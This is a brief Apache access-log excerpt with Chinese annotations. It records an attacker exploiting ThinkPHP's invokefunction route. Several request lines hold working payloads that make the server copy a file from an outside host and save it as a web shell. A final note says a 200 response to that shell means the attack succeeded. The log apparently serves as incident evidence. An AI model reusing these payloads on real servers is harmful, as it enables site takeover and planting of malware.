apache记录,
124.172.152.53 - - [27/Jan/2019:13:31:22 +0800] "GET //index.php?s=index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=copy&vars[1][]=http://43.255.29.112/php/dd.txt&vars[1][]=coonig.php HTTP/1.1" 404 25361
124.172.152.53 - - [27/Jan/2019:13:31:22 +0800] "GET //index.php?s=Home/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=copy&vars[1][]=http://43.255.29.112/php/dd.txt&vars[1][]=coonig.php%20 HTTP/1.1" 404 25493
124.172.152.53 - - [27/Jan/2019:13:31:22 +0800] "GET //index.php?s=index/%5Cthink%5CContainer/invokefunction&function=call_user_func_array&vars[0]=copy&vars[1][]=http://43.255.29.112/php/dd.txt&vars[1][]=coonig.php%20%20 HTTP/1.1" 500 23594
124.172.152.53 - - [27/Jan/2019:13:31:24 +0800] "POST //index.php HTTP/1.1" 500 25077
124.172.152.53 - - [27/Jan/2019:13:31:25 +0800] "POST //index.php?s=captcha HTTP/1.1" 404 25569
124.172.152.53 - - [27/Jan/2019:13:31:26 +0800] "GET //coonig.php HTTP/1.1" 200 1632 (这个是挂马文件,访问成功就说明攻击成功了)